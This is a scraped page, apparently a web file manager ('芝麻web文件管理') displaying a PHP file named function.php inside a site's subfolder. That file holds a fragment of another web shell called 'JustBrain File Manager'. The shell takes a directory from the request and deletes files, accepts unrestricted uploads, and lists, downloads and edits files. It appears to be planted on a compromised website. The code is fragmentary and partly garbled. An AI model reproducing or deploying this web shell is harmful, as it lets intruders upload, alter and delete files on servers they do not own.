芝麻web文件管理V1.00
编辑当前文件:/www/wwwroot/fashionmodelquicktrack.com/xc/function.php
location.href='?dir=" . urlencode(dirname($deletePath)) . "';"; exit; } // ফাইল আপলোড ফাংশন if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['fileUpload'])) { $uploadedFile = $_FILES['fileUpload']; $targetFilePath = $dir . '/' . basename($uploadedFile['name']); move_uploaded_file($uploadedFile['tmp_name'], $targetFilePath); echo ""; exit; } $files = scandir($dir); $directories = []; $regularFiles = []; foreach ($files as $file) { if ($file === '.' || $file === '..') continue; $filePath = $dir . '/' . $file; if (is_dir($filePath)) { $directories[] = $file; } else { $regularFiles[] = $file; } } ?>
JustBrain File Manager
= chr(rand(65, 90)) ?>
JustBrain File Manager
Current Path:
= htmlspecialchars(realpath($dir)) ?>
Upload File
Name
Size
Actions
📁
= $folder ?>
---
Delete
= $file ?>
= filesize($dir . '/' . $file) ?> bytes
Delete
Download
Edit